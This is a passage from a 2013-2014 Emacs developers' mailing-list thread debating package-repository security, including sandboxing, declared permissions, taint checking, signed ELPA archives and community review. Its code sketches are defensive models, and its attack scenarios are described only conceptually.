Then your model of security is inadequate. Software is *inherently*
insecure.
Agreed. But if someone says there are security leaks all over the place,
I didn't read Stefan as saying "leaks", I read him as saying "Emacs is
not designed to be your security nanny."
Post by Matthias Dahl
that is a different story. This implies those are tolerated for
various reasons.
Well, sure. A concrete block is inherently more secure against an
earthquake than a building. That doesn't mean we should replace the
latter with the former.
Post by Matthias Dahl
But they do exist and should be fixed, nevertheless.
And they are fixed, frequently. For example, "safe" and "risky" local
variables.
Post by Matthias Dahl
Agreed. But this doesn't imply that the user should be powerless against
each and every plugin he installs. One can assume that the Emacs code
base does not contain any malicious code and is thus "secure" at least
in this regard.
I gather you haven't read Ken Thompson's ACM address recently.
Post by Matthias Dahl
Right now there is absolutely nothing stopping a hacked plugin to do
just about anything until the community or the user somehow notices this.
Sure. But the problem of making a sandbox is very hard. Python gave
up. Maybe the Emacs people are smarter, but the Python developers
aren't dumb.
Post by Matthias Dahl
And what would you suggest in terms of ELPA / Marmalade and MELPA and
the package system in general based on this...?
If you care, don't use them. On my exposed system, I don't install
any XEmacs packages that I don't absolutely need.
Matthias Dahl
2013-09-27 14:18:08 UTC
Permalink
Hello Stephen...
Post by Stephen J. Turnbull
I didn't read Stefan as saying "leaks", I read him as saying "Emacs is
not designed to be your security nanny."
Well, only Stefan can clarify this. But if it was the latter, even
though I do agree, it absolutely does not imply that we should keep the
doors wide open and make no effort to support the user with regard to
security.
Post by Stephen J. Turnbull
Well, sure. A concrete block is inherently more secure against an
earthquake than a building. That doesn't mean we should replace the
latter with the former.
Stephen, I'm not advocating we should all drive around in an armored car
or never ever connect our computers with the evil internet or whatever.

I'm also _not_ saying or implying that we should make Emacs "secure" as
I know all too well that there is no such thing. But one can always make
a best effort.

All I am saying is: It would be very helpful if we could give the user a
few tools to handle, grasp and maybe harden certain security aspects.
And in this concrete discussion: It is all about plugins which, once
installed through whatever means, can do whatever they choose.

You wouldn't work as root on your system, would you? And why should a
plugin get full rights if it just needs a few pieces of information from
the local buffer?
Post by Stephen J. Turnbull
I gather you haven't read Ken Thompson's ACM address recently.
If you mean "Reflections on Trusting Trust", then to quote it: "You can't
trust code that you did not totally create yourself." If you mean that,
I fully agree.

But the reality is, we have to use software that others created. And the
open source/free software world is full of great minds and talents that
create astounding pieces of software. And the people pouring their time
and lives into those projects would usually never place any malicious
code into their creations. It is through hacks or other
circumstances that such things happen. The world is not inherently evil.
Post by Stephen J. Turnbull
Sure. But the problem of making a sandbox is very hard. Python gave
up. Maybe the Emacs people are smarter, but the Python developers
aren't dumb.
I fully agree, again. And I'm not saying a sandbox is the best solution.
I'm after a discussion about the problem... which might even lead to a
totally unexpected solution.

I did not know that the Python devs worked on a sandbox, honestly. But
the problem here is a bit more "relaxed", imho. We are not talking about
hardening / sandboxing a language in general but only a very concrete
functionality in a specific program (which, granted, is very tightly
intertwined with the language it is written in).
Post by Stephen J. Turnbull
If you care, don't use them. On my exposed system, I don't install
any XEmacs packages that I don't absolutely need.
This may reduce the risk but is this really a solution? Say you use only
the great jedi.el for your Python development. I am sure that its author
Takafumi Arakaki would never put anything harmful in it... but I can
imagine several scenarios how something harmful could end up in it
nevertheless without him noticing it for a while.

So long,
Matthias
Stephen J. Turnbull
2013-09-27 17:31:05 UTC
Permalink
Post by Matthias Dahl
Post by Stephen J. Turnbull
Well, sure. A concrete block is inherently more secure against
an earthquake than a building. That doesn't mean we should
replace the latter with the former.
Stephen, I'm not advocating we should all drive around in an
armored car or never ever connect our computers with the evil
internet or whatever.
It's an exaggeration. See below.
Post by Matthias Dahl
All I am saying is: It would be very helpful if we could give the
user a few tools to handle, grasp and maybe harden certain security
aspects. And in this concrete discussion: It is all about plugins
who, once they are installed through whatever means, can also do
whatever they choose.
Sure. *Preventing* that is going to require doing something that is
probably impossible for any program that isn't an operating system in
control of the machine.
Post by Matthias Dahl
You wouldn't work as root on your system, would you?
I do every day, to run emerge --update. ;-)
Post by Matthias Dahl
And why should a plugin get full rights if just needs a few infos
from the local buffer?
It shouldn't. But that question is not interesting and the answer
isn't controversial. The interesting question is, "why should a
plugin be denied the rights it needs when those go beyond reading the
buffer it was invoked from?"
Post by Matthias Dahl
But the reality is, we have to use software that others created. And the
open source/free software world is full of great minds and talents that
create astounding pieces of software. And those people working pouring
the time and life into those projects, usually would never place
any malicious code into their creations. It is through hacks or other
circumstances that such things happen. The world is not inherently evil.
True. The world is not. In fact, most of the bad guys aren't evil,
just willing to bend the rules a bit to get their way. Still, cracked
is cracked, and it only takes once, no matter what the ratio of
great|talented|astounding is to "warped". And that's why the issue
here is that the answer to the "interesting question" is the same one
that a mother gives to a 5-year-old: "just because". The way to get
the necessary permission in general is to ask the user each time the
program wants access.
Post by Matthias Dahl
I did not know that the Python devs worked on a sandbox, honestly.
They didn't just work on it; they had one (the restricted execution
option) and then they stopped distributing it because it didn't keep
its promises. There's been work on a better one, but IIRC it hasn't
been PEP'ed yet. And nobody except the author (who is very good, I
admit) has really tried to "break" it or use it in production.
Post by Matthias Dahl
But the problem here is a bit more "relaxed", imho. We are not talking about
hardening / sandboxing a language in general but only a very concrete
functionality in a specific program (which, granted, is very tightly
intervened with the language it is written in).
No, it's *not* a concrete functionality. The concrete functionality
is "Shall the plugin be installed?" The answer to that is easy to
implement.

But if you're talking about preventing an untrusted plugin from doing
"evil" things, you need to accompany every call to a sensitive
function with some way to determine whether the function should be
executed or not. That is a sandbox, but you're welcome to call it by
a different name if you like.
Post by Matthias Dahl
[Refusing to install untrusted code] may reduce the risk but is
this really a solution?
I believe there is no solution. Security as we understand it today is
about preventing some entities from accessing the functionality of
certain other entities. The more security, the less functionality can
be accessed. You can't get both to 100%.
Post by Matthias Dahl
Say you use only the great jedi.el for your Python development. I
am sure that its author Takafumi Arakaki would never put anything
harmful in it... but I can imagine several scenarios how something
harmful could end up in it nevertheless without him noticing it for
a while.
Sure. But the chances are pretty good that I would. Anyway, the
definition of "absolutely need" is "I'm willing to bet that I or some
other user would catch it even if the author doesn't."

There's another answer based on the details of your example. I avoid
doing development on exposed hosts. In one sense that's unfair, but
in another it goes to the heart of the matter.
Matthias Dahl
2013-09-30 15:25:06 UTC
Permalink
Hello Stephen...
Post by Stephen J. Turnbull
Sure. *Preventing* that is going require doing something that is
probably impossible for any program that isn't an operating system in
control of the machine.
I am not saying a sandbox is the best solution. But imho, something
should be done... or would be nice to have. Even if it is community
based reputation system.
Post by Stephen J. Turnbull
Post by Matthias Dahl
You wouldn't work as root on your system, would you?
I do every day, to run emerge --update. ;-)
Ah, a fellow Gentoo user. ;) Running system updates as root is one
thing; working as root as a daily routine where those privileges are
just not required is careless (for many reasons), to say the least. And
I guess that is not what you do. :)
Post by Stephen J. Turnbull
The interesting question is, "why should a plugin be denied the rights
it needs when those go beyond reading the buffer it was invoked from?"
Who said it should be denied those privileges? If it was installed and
declared its required permissions, it will get them. Or am I missing
something obvious in your statement/question here?
Post by Stephen J. Turnbull
Sure. But the chances are pretty good that I would. Anyway, the
definition of "absolutely need" is "I'm willing to bet that I or some
other user would catch it even if the author doesn't."
So you check the source of the plugins you use with each new update? How
else would you notice malicious code?

And if a plugin is driven by a single author, chances are that something
can go unnoticed for a while if the target group of said plugin is not a
very technical one... and as I learned in this thread, there are many
more Emacs users with a non-technical background.
Post by Stephen J. Turnbull
There's another answer based on the details of your example. I avoid
doing development on exposed hosts. In one sense that's unfair, but
in another it goes to the heart of the matter.
Which shows you care about security too and take preventive measures.
Unfortunately, not everybody can work that way, for various reasons.

So long,
Matthias
Stephen J. Turnbull
2013-10-01 02:19:50 UTC
Permalink
Post by Matthias Dahl
I am not saying a sandbox is the best solution. But imho, something
should be done... or would be nice to have. Even if it is community
based reputation system.
We already have that. GNU ELPA requires somebody who has been
acknowledged to be responsible to look at it before it gets added.
Some of the others don't.
Post by Matthias Dahl
Who said it should get those privileges denied? If it was installed and
declared its required permissions, it will get those. Or am I missing
something obvious from your statement/question here?
No, you're missing the fact that self-declaring required permissions
means you get all the permissions you need. For good or evil....
Post by Matthias Dahl
Post by Stephen J. Turnbull
Sure. But the chances are pretty good that I would. Anyway, the
definition of "absolutely need" is "I'm willing to bet that I or some
other user would catch it even if the author doesn't."
So you check the source for the plugins you use with each new
update?
On exposed hosts and for applications that can be invoked by any user,
yes, I do.
Post by Matthias Dahl
Which shows, you care about security too and take preventive measures.
Unfortunately, not everybody can work that way for various reasons, though.
And those who don't will eventually pay the price. That's OK, it may
very well be a rational choice to take the risk. I do, on other hosts
with other purposes. But the problem is that typically other people
*also* pay the price.
chad
2013-09-27 20:12:18 UTC
Permalink
Post by Matthias Dahl
All I am saying is: It would be very helpful if we could give the user a
few tools to handle, grasp and maybe harden certain security aspects.
If the user is downloading and running random code from the internet
without checking its source in any way, then there's really not
very much you can do. Java tries to do this at fairly great expense,
and only vaguely succeeds. Python tried and gave up (apparently).

If people download and run code from GNU ELPA, then there's a
moderate degree of group-checking safety involved, similar to Debian
(once elpa signing is in place). If they insist on using random
snippets from wikis, forums, and marmalade (apparently; I haven't
looked closely at marmalade), then there's really not.
Post by Matthias Dahl
You wouldn't work as root on your system, would you? And why should a
plugin get full rights if just needs a few infos from the local buffer?
I think this `joke' from XKCD is pretty instructive here:

http://xkcd.com/1200/

In other words, "at least they didn't get root" doesn't really
reflect the way computers are used today (/for the last decade).

As a practical matter of giving the user a few tools, you might be
better off looking at taint checking (perl, ruby) and warning the
user (and potentially, elpa/marmalade/etc), rather than trying to
add java-style sandboxing to elisp.
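To make the taint-checking suggestion concrete, here is a minimal sketch of the idea (in the spirit of Perl's -T mode), written in Python only for concreteness. All names are hypothetical illustrations of the mechanism, not an existing Emacs, Perl, or Ruby API: data from untrusted sources carries a taint flag, and sensitive sinks refuse tainted input unless it has passed an explicit validation step.

```python
class Tainted(str):
    """A string marked as originating from an untrusted source."""
    pass

def from_untrusted_source(s):
    """Everything read from the network, a package, etc. starts tainted."""
    return Tainted(s)

SAFE_CHARS = set("abcdefghijklmnopqrstuvwxyz0123456789._-/")

def untaint(s):
    """Only an explicit validation step removes the taint flag."""
    if all(c in SAFE_CHARS for c in s):
        return str(s)  # a plain str carries no taint
    raise ValueError("refusing to untaint suspicious input")

def run_shell_command(cmd):
    """A sensitive sink: warn/refuse rather than silently execute."""
    if isinstance(cmd, Tainted):
        raise RuntimeError("tainted data reached a shell command")
    return "would run: " + cmd
```

The point of the scheme is exactly what chad describes: instead of sandboxing everything, the user (or the archive) gets a warning at the moment untrusted data reaches a dangerous operation.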

I hope that helps,
~Chad
Andreas Röhler
2013-09-26 09:31:33 UTC
Permalink
Post by Stephen J. Turnbull
Post by Matthias Dahl
Hello Stefan...
Post by Stefan Monnier
Security problems in Emacs are everywhere, indeed.
Actually not quite the statement one wants to read _ever_ about the
software one loves to use. ;)
The question that is bugging me now: Why is that? Since Emacs, imho,
addresses a more technical audience and is maintained by professionals,
I wouldn't expect such a thing, actually.
Then your model of security is inadequate. Software is *inherently*
insecure. [ ... ]
That's it.

BTW, why don't we drive armored cars in daily life, if armored cars are designed to be more secure?
Because experiences in a dry and rocky region proved the opposite.
Richard Stallman
2013-09-26 16:25:32 UTC
Permalink
[ To any NSA and FBI agents reading my email: please consider
[ whether defending the US Constitution against all enemies,
[ foreign or domestic, requires you to follow Snowden's example.

The basic question is, what sorts of things do we want security against?

So far, we have put effort into security against

* Attacks through files you might examine.

* Surreptitious substitution of the wrong code
instead of what you think you are downloading.

If the existence of package repositories introduces new ways to do
those things, we should do what is needed to make them safe.

Does anyone think we should start worrying about some other attack?
--
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
Use Ekiga or an ordinary phone call.
Matthias Dahl
2013-09-27 14:18:03 UTC
Permalink
Hello Richard...
Post by Richard Stallman
* Surreptitious substitution of the wrong code
instead of what you think you are downloading.
In all honesty, I strongly believe that packages that contain malicious
code would fall under this category.

I think the world in Emacs has changed: It is now even easier to get
packages simply through the package system. Projects advertise that they
should be installed through (M)ELPA or Marmalade. Yet nowhere is there
any mention of the security aspects of this.

- Neither repository checks the code for quality and security. And if
a plugin should be withdrawn from a repository because it really was
infected, there is no way to inform users about it except through the
bad press that follows.

As a counter example: Plugins distributed through addons.mozilla.org
are checked for security - initial versions as well as updates.

- An Emacs plugin can do whatever it chooses to do with the full
privileges of the current user. But why give a plugin all such power
in the first place? Informing the user beforehand what privileges a
plugin requires, and thus tightening the belt on a plugin, would make
things more transparent and more secure.

I would also _never_ install anything from MELPA if the source of it was
from the wiki which everyone can edit freely, afaik.

Sorry for the wall of text. :(

So long,
Matthias
Óscar Fuentes
2013-09-27 15:04:55 UTC
Permalink
Matthias Dahl <ml_emacs-***@binary-island.eu> writes:

[snip]
Post by Matthias Dahl
As a counter example: Plugins distributed through addons.mozilla.org
are checked for security - initial versions as well as updates.
I don't think that comparing Emacs to a web browser used by tens of
millions is fair. The latter is a major attack target/vector for any
crook, while Emacs is mostly uninteresting. No matter how much effort
the Mozilla guys put into security, it is their web browser that is the
real security threat on your system, not Emacs.
Post by Matthias Dahl
- An Emacs plugin can do whatever it chooses to do with the full
privileges of the current user. But why give a plugin all such power
in the first place? Informing the user beforehand what privileges a
plugin required and thus tightening the belt on a plugin, would make
things more transparent and more secure.
Yes, sure. And I think that it can be achieved without too much effort
(read: without rewriting whole chunks of Emacs code.)

Add support for declaring the capabilities the .el file being read
requires: write access to the filesystem, network I/O, running
processes, etc. Encode that in a data structure (a plain integer would
do) associated with each function in that .el file. Then, when a function
is executed, its permissions become effective and are checked by the
primitive functions that implement the sensitive operations. Of course,
when function F calls function G, the permissions of F apply to G,
in a restrictive way. Also, it could be possible to declare "safe"
functions whose privileges can override the caller's permissions in a
permissive way. Those functions would be in the Emacs core, of course.

I guess that this scheme would require minimal changes to the
interpreter, byte compiler and core functions that perform sensitive
operations. In exchange, the user would know that such and such packages
are not allowed to send his all-important files over the internet,
nor delete his entire home directory.
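The scheme above can be sketched in a few lines; Python is used here only for concreteness, and every name is a hypothetical illustration of the proposal, not anything that exists in Emacs: capabilities are bits in a plain integer, sensitive primitives check the effective set, and a call from F to G runs restrictively under the intersection of both sets.

```python
# Each declared capability is one bit in a plain integer, as suggested.
CAP_FS_WRITE = 1 << 0  # write access to the filesystem
CAP_NETWORK  = 1 << 1  # network I/O
CAP_PROCESS  = 1 << 2  # running subprocesses

class CapabilityError(Exception):
    pass

def check(effective, required, operation):
    """Primitive functions implementing sensitive operations call this."""
    if effective & required != required:
        raise CapabilityError(operation + ": capability not granted")

def call_with_caps(caller_caps, callee_caps, func, *args):
    """When function F calls function G, F's permissions apply to G
    restrictively: G runs with the intersection of both sets."""
    return func(caller_caps & callee_caps, *args)

def write_file(effective, path, data):
    """A stand-in for a sensitive core primitive."""
    check(effective, CAP_FS_WRITE, "write-file")
    return "wrote %d bytes to %s" % (len(data), path)
```

With this encoding, a package that never declared network access can call whatever it likes: the moment the call chain reaches a network primitive, the check fails, regardless of how many intermediate functions were involved.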

[snip]
Thomas Koch
2014-09-13 17:57:15 UTC
Permalink
Post by Óscar Fuentes
I don't think that comparing Emacs to a web browses used by tens of
millions is fair. The later is a major attack target/vector for any
crook, while Emacs is mostly uninteresting. No matter all the effort the
Mozilla guys put on security, it is their web browser the real security
threat on your system, not Emacs.
If I had criminal interests and the possibility to distribute malicious
Lisp code to a few hundred Emacs users, I'd:

- collect all private ssh and gpg keys found in the victims' home
directories, along with access data for their email accounts
- replace my attack lisp code with legitimate code after it has done its work
- sell the collected data to interested parties

I know that there are a lot of Emacs users who are system administrators
of interesting targets.

Regards, Thomas Koch

Ted Zlatanov
2013-09-29 10:12:19 UTC
Permalink
On Thu, 26 Sep 2013 12:25:32 -0400 Richard Stallman <***@gnu.org> wrote:

RS> The basic question is, what sorts of things do we want security against?

RS> So far, we have put effort into security against

RS> * Attacks through files you might examine.

RS> * Surreptitious substitution of the wrong code
RS> instead of what you think you are downloading.

RS> If the existence of package repositories introduces new ways to do
RS> those things, we should do what is needed to make them safe.

We need to question whether relying on GPG is the right thing here, or
if we need an Emacs Lisp-based or C-based solution to authenticate
content signatures. I am leaning towards the latter after years of
experience with GPG and epg.el (without questioning the quality of
epg.el, which is very good). At the very least, spawning an external
process to verify a signature for every package download seems wasteful.

In addition, I think we need reviews of package updates before they are
rolled out on the GNU ELPA. It's a lot of work.

RS> Does anyone think we should start worrying about some other attack?

"Just because you're paranoid doesn't mean they're not after you."

Here is a quick list of other attacks. I am not posing conspiracy
theories; the below are all based on real-life compromises I have seen
in other software or in GNU Emacs.

(note that the GNU ELPA can be used by many versions of Emacs, some with
bugs that are fixed later but could be exploitable at that version)

- injection of binary blobs, even if well-intended

- injection of external resources, e.g. a URL which suddenly starts
generating an image that can exploit a libgif bug to compromise a
system (note that this can be easily targeted to a single IP)

- DDoS of a target website or service by using their resources (this
could be intentional or accidental)

- injection of code that is not GPLed or is otherwise legally
questionable

- targeted attacks, e.g. compromises that work on only one user's
machine but behave well otherwise

- exploits of the Emacs Lisp parser, e.g. imagine a bug in the hashtable
reader or a specially-formatted comment that breaks the symbol table
(I'm not aware of such bugs, this is just an example)

- exploits of file-local variables

- advice-based attacks (package X advises function F in a non-obvious
way to compromise security)

I hope this is useful.

Ted
Ted Zlatanov
2013-09-29 09:53:36 UTC
Permalink
Post by Matthias Dahl
I know there has been a thread about (more or less) this topic sometime
last year, iirc. But I was unable to find something current, so I hope
it is okay to raise a few questions and ideas about this subject.
SM> The current state, AFAIK is that we decided that ELPA servers should
SM> put *.gpg signatures alongside their tarballs and other files, signed
SM> with an "archive" key. This signature can be used to check that the
SM> package you get indeed comes from that archive.

SM> In terms of code, it's not implemented yet, AFAIK (IIRC Ted is working
SM> on it).

VERY slowly. I tried to get back to it, only to find out (see other
thread under subject "bad epg.el+GPG2 behavior: unavoidable passphrase
pinentry prompt") that GPG2 is practically unusable. Frustrating.

As I've mentioned in the past, I dislike relying on an external binary
like GPG to do encryption so this is pushing me again towards a more
built-in Lispy way to do signing of packages. Opinions welcome,
especially if you can think of a way that Emacs can sign files in a
similar way to GPG keys in Lisp.

In any case, I posted a patch (probably needs to be rewritten by now)
which intercepted package.el file requests and required an additional
.sig file that signed the file. So any file, tarball, or index requires
a maintainer signature to be used.
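The flow that patch implements can be modeled compactly. This is a toy sketch: real ELPA signing uses GPG public-key detached signatures, and a plain HMAC with a shared key stands in here only to keep the example self-contained and runnable; all names are hypothetical.

```python
import hashlib
import hmac

ARCHIVE_KEY = b"archive-signing-key"  # hypothetical maintainer key

def sign(data):
    """What the maintainer runs when rolling out a reviewed release."""
    return hmac.new(ARCHIVE_KEY, data, hashlib.sha256).hexdigest()

def fetch_and_verify(name, files):
    """Intercept a package-file request: refuse any file whose
    companion .sig is missing or does not verify against its contents."""
    data = files.get(name)
    sig = files.get(name + ".sig")
    if data is None or sig is None:
        raise RuntimeError(name + ": file or detached signature missing")
    if not hmac.compare_digest(sig, sign(data)):
        raise RuntimeError(name + ": signature verification failed")
    return data
```

The effect is the "wall" discussed later in the thread: since only a maintainer can produce valid signatures, nothing reaches users without having passed through a signing (and, ideally, review) step.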
Post by Matthias Dahl
The best solution imho would be that each package on a package server,
no matter which one, is reviewed before being available either through a
dedicated staff of volunteers or through a more open process that makes
use of the user base somehow (which could be very difficult in terms of
trustworthiness).
SM> Not gonna happen, indeed. It doesn't happen for Debian either, FWIW, so
SM> it's usually not considered as a very major problem.

SM> W.r.t. GNU ELPA packages, every commit installed sends an email
SM> containing the diff to a mailing-list to which some people are
SM> subscribed, so there is a bit of review there, but it's far from
SM> sufficient to prevent introduction of security problems.

Stefan, I don't know if you remember it the same way, but when I worked
with you on getting ELPA started, I recall I had the maintainer rolling
out updates manually after review. We added the cron job later (maybe I
was involved, I honestly don't remember) but I definitely wanted to
avoid the current situation where updates to GNU ELPA packages get
rolled out straight to our users without review.

Unlike VCS updates, the GNU ELPA updates go to live users who don't know
they may be using bleeding-edge or risky code, and IMHO should be gated
by some kind of maintainer review or at least marked as "unreviewed
update" in the UI. The auto-merging of external repos is an even bigger
issue; again we need to establish a wall between developers and our live
users but here we trust external groups of contributors to DTRT.

I would propose using the signature files above to provide that wall,
so auto-signing should not be done. Instead a maintainer team should
review changes that need to go up on the GNU ELPA.
Post by Matthias Dahl
So, I'd like to propose the following as at least some measure of
protection and a first step in making the package system more secure: A
package gets a security context which details its very own permissions
just like e.g. an Android app. That context is permanent, meaning that
SM> Sandboxing could be an interesting direction, but it seems very
SM> difficult: not only it'll be a non-trivial amount of implementation
SM> work, but even just designing it will be difficult, due to the current
SM> nature of Emacs's design where everything is global and shared.

There are too many ways to compromise Emacs Lisp because it was not
written with security in mind. Also see my previous proposals for
secure data storage in Emacs, which would certainly be relevant if we
consider external packages as a possible attack vector. Even that
relatively minor improvement has met significant resistance; I would
imagine a full security-oriented redesign would be as popular as
SELinux.

Ted
Daiki Ueno
2013-09-29 17:49:36 UTC
Permalink
On Mon, 23 Sep 2013 10:17:33 -0400 Stefan Monnier
SM> The current state, AFAIK is that we decided that ELPA servers should
SM> put *.gpg signatures alongside their tarballs and other files, signed
SM> with an "archive" key. This signature can be used to check that the
SM> package you get indeed comes from that archive.
SM> In terms of code, it's not implemented yet, AFAIK (IIRC Ted is working
SM> on it).
VERY slowly. I tried to get back to it, only to find out (see other
thread under subject "bad epg.el+GPG2 behavior: unavoidable passphrase
pinentry prompt") that GPG2 is practically unusable. Frustrating.
I don't see much relation between this and what Stefan is talking about
above. For signature verification, a passphrase prompt shouldn't be
needed, since verification does not require any secret-key operation.

For signing with an "archive" key, do you really want to do that with
Emacs, instead of other handy scripting languages?
As I've mentioned in the past, I dislike relying on an external binary
like GPG to do encryption, so this is pushing me again towards a more
built-in, Lispy way of signing packages. Opinions welcome, especially
if you can think of a way for Emacs to sign files in Lisp, similarly to
what GPG does with its keys.
I remember that you asked this in the past, and I answered that it might
make some sense as long as the code produces a signature in a
standardized format as GPG does. You then responded that you didn't
have enough knowledge to implement it.

I don't think it is a constructive attitude to repeat the same argument
without any outcome, while omitting this background.

Regards,
--
Daiki Ueno
Ted Zlatanov
2013-09-29 18:18:36 UTC
Permalink
On Mon, 23 Sep 2013 10:17:33 -0400 Stefan Monnier
SM> The current state, AFAIK is that we decided that ELPA servers should
SM> put *.gpg signatures alongside their tarballs and other files, signed
SM> with an "archive" key. This signature can be used to check that the
SM> package you get indeed comes from that archive.
SM> In terms of code, it's not implemented yet, AFAIK (IIRC Ted is working
SM> on it).
VERY slowly. I tried to get back to it, only to find out (see other
thread under subject "bad epg.el+GPG2 behavior: unavoidable passphrase
pinentry prompt") that GPG2 is practically unusable. Frustrating.
DU> I don't see much relation between this and what Stefan is talking about
DU> above. For signature verification, a passphrase prompt shouldn't be
DU> needed, since verification does not require any secret-key operation.

Right. I didn't mean that GPG2 is blocking the package signing work
specifically.

But if, for any reason, GPG2 decides to pop up passphrase prompts, it
will make package.el unusable *and it can't be disabled*. So this is a
concern IMO, even if we assume it will not require passphrases, because
it could make the user experience painful in ways outside of our
control. This is what annoys me about GPG 1 and 2: each is an
application, not a library. At least GPG1 could be consistently driven
in batch mode.

DU> For signing with an "archive" key, do you really want to do that with
DU> Emacs, instead of other handy scripting languages?

Naturally.
As I've mentioned in the past, I dislike relying on an external binary
like GPG to do encryption, so this is pushing me again towards a more
built-in, Lispy way of signing packages. Opinions welcome, especially
if you can think of a way for Emacs to sign files in Lisp, similarly to
what GPG does with its keys.
DU> I remember that you asked this in the past, and I answered that it might
DU> make some sense as long as the code produces a signature in a
DU> standardized format as GPG does. You then responded that you didn't
DU> have enough knowledge to implement it.

DU> I don't think it is a constructive attitude to repeat the same argument
DU> without any outcomes and even omitting the background.

Let's just say I'll implement the OpenPGP protocol emulation as in
http://tools.ietf.org/html/rfc4880 when I get to it, and anyone else
that thinks it's worthwhile can work with me or do it themselves.
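For context, RFC 4880 frames all OpenPGP data, signatures included, as a
sequence of packets, so the first thing any implementation (Lisp or
otherwise) needs is a packet-header decoder. A minimal sketch in Python
(the function name is invented for illustration; partial body lengths and
indeterminate lengths are deliberately left out):

```python
def parse_packet_header(data: bytes):
    """Decode one OpenPGP packet header (RFC 4880, section 4.2).
    Returns (tag, body_length, header_length)."""
    first = data[0]
    if not first & 0x80:
        raise ValueError("bit 7 must be set in a packet header")
    if first & 0x40:                       # new-format packet
        tag = first & 0x3F                 # tag in bits 5-0
        l0 = data[1]
        if l0 < 192:                       # one-octet body length
            return tag, l0, 2
        if l0 < 224:                       # two-octet body length
            return tag, ((l0 - 192) << 8) + data[2] + 192, 3
        if l0 == 255:                      # five-octet body length
            return tag, int.from_bytes(data[2:6], "big"), 6
        raise ValueError("partial body lengths not handled in this sketch")
    # old-format packet: tag in bits 5-2, length type in bits 1-0
    tag = (first & 0x3C) >> 2
    ltype = first & 0x03
    if ltype == 3:
        raise ValueError("indeterminate length not handled in this sketch")
    nlen = 1 << ltype                      # 1, 2 or 4 length octets
    return tag, int.from_bytes(data[1:1 + nlen], "big"), 1 + nlen
```

Tag 2 is a Signature packet, which is the case a package verifier would
care about first.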

I hope you consider that constructive.

Ted
Ted Zlatanov
2013-09-30 13:25:39 UTC
Permalink
On Sun, 29 Sep 2013 14:18:36 -0400 Ted Zlatanov <***@lifelogs.com> wrote:

TZ> Let's just say I'll implement the OpenPGP protocol emulation as in
TZ> http://tools.ietf.org/html/rfc4880 when I get to it, and anyone else
TZ> that thinks it's worthwhile can work with me or do it themselves.

Hmm, looks like libnettle (brought in with GnuTLS) already provides most
of the infrastructure needed. The question for me is, should I bother
with a full OpenPGP signature emulation, or is it sufficient to
implement RSA/DSA/EC-based signatures for Emacs internal use only? The
latter is going to be much less work; it's basically exposing to Emacs
the functions in:
http://www.lysator.liu.se/~nisse/nettle/nettle.html#RSA
http://www.lysator.liu.se/~nisse/nettle/nettle.html#DSA
http://www.lysator.liu.se/~nisse/nettle/nettle.html#Elliptic-curves
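To make concrete what "RSA-based signatures" mean at the primitive level,
here is a toy sketch in Python: textbook RSA with tiny hard-coded
parameters, insecure and for illustration only. Nettle's actual signing
functions do the padded, PKCS#1-style equivalent of this in C.

```python
import hashlib

# Toy RSA parameters -- far too small for real use, chosen so the
# arithmetic is easy to follow.  p and q are primes, e the public exponent.
p, q = 61, 53
n = p * q                              # 3233, the public modulus
e = 17
d = pow(e, -1, (p - 1) * (q - 1))      # private exponent

def sign(message: bytes) -> int:
    """'Sign' the SHA-256 hash of message: s = H(m)^d mod n."""
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(h, d, n)

def verify(message: bytes, signature: int) -> bool:
    """Accept iff s^e mod n equals H(m) mod n."""
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == h

sig = sign(b"archive-contents")        # verify(b"archive-contents", sig) holds
```

The archive would publish n and e; only the signing host holds d. A
tampered file hashes to a different value, so verification fails.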

Ted
Stephen J. Turnbull
2013-09-30 14:50:57 UTC
Permalink
Post by Ted Zlatanov
Hmm, looks like libnettle (brought in with GnuTLS) already provides most
of the infrastructure needed. The question for me is, should I bother
with a full OpenPGP signature emulation,
No, don't just "emulate" it, implement the protocol accurately.
Post by Ted Zlatanov
or is it sufficient to implement RSA/DSA/EC-based signatures for
Emacs internal use only?
No. In security, multiple implementations are a very good thing as
long as they're used to cross-check correct implementation of a
protocol and don't define their own protocols.
Matthias Dahl
2013-09-30 15:10:43 UTC
Permalink
Hello...
Post by Ted Zlatanov
I would propose using the signature files above to provide that wall,
so auto-signing should not be done. Instead a maintainer team should
review changes that need to go up on the GNU ELPA.
Ted, that would be really nice to have but as it was brought up earlier
in this thread, this is not gonna happen. And I can honestly understand
why it can't happen. The amount of manpower required to really do this
properly is not something that could easily be shouldered by a team of
trusted volunteers in a timely manner.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Ted Zlatanov
2013-09-30 17:18:10 UTC
Permalink
On Mon, 30 Sep 2013 17:10:43 +0200 Matthias Dahl <***@binary-island.eu> wrote:

MD> Hello...
Post by Ted Zlatanov
I would propose using the signature files above to provide that wall,
so auto-signing should not be done. Instead a maintainer team should
review changes that need to go up on the GNU ELPA.
MD> Ted, that would be really nice to have but as it was brought up earlier
MD> in this thread, this is not gonna happen. And I can honestly understand
MD> why it can't happen. The amount of manpower required to really do this
MD> properly is not something that could easily be shouldered by a team of
MD> trusted volunteers in a timely manner.

A much more complex version of this process works for Debian. I think
the volume of changes is manageable for a daily review, especially if we
move to a branch + pull request + merge model for the GNU ELPA. GitHub's
infrastructure and UI for this are quite good. Oh, and of course the
same branch + pull request + merge model could apply to the Emacs core
as well; that IMO would be really nice.

I think it's much less likely that Emacs will be rewritten to provide a
sandbox for packages, and a community review process is more valuable in
the long term in any case.

Ted
Matthias Dahl
2013-10-01 14:03:56 UTC
Permalink
Hello @all...

First of all, thanks to everyone for weighing in their respective
opinions and investing their time-- on- and off list.

A sandbox, as initially discussed, is unanimously seen as the wrong path
to take for various reasons that were brought up in detail, so I stand
corrected and agree with the admittedly convincing arguments.

But some interesting points came up in the course of all of this: there
are people reviewing packages, even if only for their own sake and their
own security needs. Those people check code and the history of the
maintainers, and keep a watchful eye on things. But they usually do so
only for themselves.

Maybe this is just wishful thinking, but what if we could channel that
effort into a single, package-repository-independent project?

Please let me explain: the project would mostly build on the web-of-trust
principle. Basically, people can review and rate packages, and in order
to do so, you need a certain level of trust, which you gain through
ratings or endorsements from already-trusted reviewers. Initially those
could be the Emacs and respective package maintainers, and so forth.
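To illustrate the bootstrapping, here is a small hypothetical sketch:
trust starts from a seed set (say, the Emacs maintainers), and a reviewer
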